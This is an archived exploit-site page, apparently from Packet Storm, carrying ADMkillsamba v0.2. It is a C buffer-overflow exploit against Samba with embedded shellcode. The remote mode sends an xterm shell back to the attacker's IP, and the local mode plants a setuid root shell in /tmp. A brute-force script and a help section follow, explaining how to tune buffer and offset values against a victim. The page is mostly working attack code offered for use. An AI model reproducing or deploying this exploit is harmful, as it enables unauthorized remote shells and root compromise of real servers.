Twenty Year Anniversary

ADMultimateSMBsploit

ADMultimateSMBsploit
Posted Sep 23, 1999

ADMultimateSMBsploit

MD5 | 855a8450c3bf6179388a21b6f43ea46b

ADMultimateSMBsploit

Change Mirror Download
/*                    ___      ______      _       _
/ \ | _ \ | \ / |
| / \ | | | \ | | \_/ |
| |___| | | |_ / | | \_/ |
| --- | | / | | | |
''' ''' ''''''' '''' ''''

ADMkillsamba ver 0.2 argh ADM back again ! :)))
whats new ?: i have include a krad help & a verry Fast utility for found
smbserver <note: u can use it for found imapd :)> ; a script shell for make
brutal buff/offset for the sploit heh a lot of surprise < hahah supeer:)
the buffer have a better structure <4 a better world ??> & option for local
sploit :) cya ppl
admsmb@hotmail.com <note: is only for smbd sploit ! ADM have no email etc */



/* ADMkillsamba-v0.2.c */

#define DEFAULT_OFFSET 3500
#define DEFAULT_BUFFER_SIZE 3081
#define NOP 0x90
#include <stdio.h>
#include <strings.h>
#include <stdlib.h>
unsigned char shellcode[500] =

"\xeb\x2f\x5f\xeb\x4a\x5e\x89\xfb\x89\x3e\x89\xf2\xb0\xfe\xae\x74"
"\x14\x46\x46\x46\x46\x4f\x31\xc9\x49\xb0\xff\xf2\xae\x30\xc0\x4f"
"\xaa\x89\x3e\xeb\xe7\x31\xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd"
"\x80\xe8\xcc\xff\xff\xff";

unsigned char localshell[]=
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/IK";


void main(int argc, char *argv[]) {
FILE *filez;
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
char netbios_name[100];
char bufferz[255];
char ipz[40];
char myipz[40];
unsigned char bla[50] = "\xfe\xe8\xb1\xff\xff\xff";
int *ret;
unsigned char cmd[50]="/usr/X11R6/bin/xterm\xff-display\xff";
unsigned char arg1[50];
int i;

bzero(netbios_name,100);
bzero(bufferz,255);
bzero(ipz,40);
bzero(ipz,40);

if(argc <3){
printf(" usage Remote: ADMkillsamba R <ip of the victim> <netbios name> <your ip> [buff size] [offset size]\n");
printf("<ip of victim> = 11.11.11.11 ! THe numerical IP Only ! not www.xxx.cc !\n");
printf("<netbios name> = VICTIME for get the netbios name use ADMnmbname or ADMhack\n");
printf("<your ip> = the sploit send a xterm to your machine heh \n");
printf("option:\n");
printf("[buff size] = the size of the buffer to send default is 3081 try +1 -1 to a plage of +10 -10\n");
printf("[offset size] = the size of the offset default is 3500 try +50 -50 to a plage of 1000 -1000\n");
printf("usage Local: ADMkillsamba L <netbios name> [buffer size] [offset size]\n");
printf(" HaVe Fun\n");
exit(0);
}

if(*(argv[1]+0)=='R'){
printf("Remote sploit\n");
sprintf(arg1,"%s:0\xff-e\xff/bin/sh\xff",argv[4]);
shellcode[4] =(unsigned char)0x32+strlen(cmd)+strlen(arg1);
bla[2] =(unsigned char) 0xc9-strlen(cmd)-strlen(arg1);
if (argc > 5) bsize = atoi(argv[5]);
if (argc > 6) offset = atoi(argv[6]);
strcat(shellcode,cmd);
strcat(shellcode,arg1);
strcat(shellcode,bla);
strcat(shellcode,"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx");
strcpy(ipz,argv[2]); /* haha u can overflow my sploit :) */
strcpy(netbios_name,argv[3]);
}

if(*(argv[1]+0)=='L'){
printf("Local sploit\n");
strcpy(shellcode,localshell);
strcpy(netbios_name,argv[2]);
strcpy(ipz,"127.0.0.1");
filez=fopen("/tmp/IK","w+");
fprintf(filez,"#!/bin/sh\n");
fprintf(filez,"cp /bin/sh /tmp/.sh-r00t\n");
fprintf(filez,"chmod 4777 /tmp/.sh-r00t\n");
fflush(filez);
fclose(filez);
system("chmod a+x /tmp/IK");
}


if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}

sprintf(bufferz,"\\\\\\\\%s\\\\IPC$",netbios_name);


addr = 0xbffffff0 - offset ;
printf("Using address: 0x%x\n", addr);

ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;

for (i = 0; i < bsize/2; i++)
buff[i] = NOP;

ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];

buff[bsize - 1] = '\0';

execl("./smbclient","smbclient",bufferz,buff,"-I",ipz,NULL);


}


--------------------------------small help------------------------------------

ADMsmb HELP v0.1

( a krad help =) )

Q: why the sploit gimme alwais the msg Broken pipe ???
A: ok diz msg appear when you have not the good buffer_size/offset value
yes diz param change on every machine ! u must found it! for that try
a brutal force on the buff/offset see the script :)


-------------------------------Brutal Force-----------------------------------
#!/bin/sh
declare -i D
declare -i OFF
declare -i try
declare -i BUFF
BUFF=3081 # buffer size
while true
do
D=1000 # offset
while test "$D" -lt 8000
do
./ADMkillsamba <ip of the victim> <netbios name of the vic> <your iP> $BUFF $D
echo
echo $D
echo $BUFF
echo
D=D+25
done
BUFF=BUFF+1
done
---------------------------------------------------------------------------------



Q: what is the best param for buff/offst .?
A: first try with diz param buffer=3081 offset=3500 if is dont work try
to change the offset size 1000 at 8000 if he dont run try buff size 3075
at 3090 i know its hard but with experience its simple =)

Q: how to found the buff size ??
A: simple ! launch ADMkillsamba with buff/size=1000 if the srv dont make
a broken pipe the buffer was to small try by step of 100 when the srv
give u a broken pipe ; try to see the precise value ! and make a scan on
it =)

ex: buff = 3000 no broken pipe
buff = 3100 broken pipe
buff = 3050 no broken pipe
buff = 3070 broken pipe < scan to 3070 at 3100


Q: the offset size ??
A: Scan it :)


PS: if u found a offset & buff/size on a system plz send it i'am gonna make
a list of the most curently buff/size

PPS: if u wanna code a char shell for a other OS mail me !

news: ADM gonna make a home page for diz sploit dont forget to see it for
more helps tips/etc

cya

--------------------------------------------------------------------------------
U CAN GET THE BIN OF ADMFINDALL IN FTP.JANOVA.ORG/PUB/ADM !!!!!!

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    3 Files
  • 3
    Sep 3rd
    15 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    18 Files
  • 6
    Sep 6th
    18 Files
  • 7
    Sep 7th
    15 Files
  • 8
    Sep 8th
    2 Files
  • 9
    Sep 9th
    2 Files
  • 10
    Sep 10th
    16 Files
  • 11
    Sep 11th
    17 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    29 Files
  • 14
    Sep 14th
    21 Files
  • 15
    Sep 15th
    3 Files
  • 16
    Sep 16th
    1 Files
  • 17
    Sep 17th
    15 Files
  • 18
    Sep 18th
    16 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close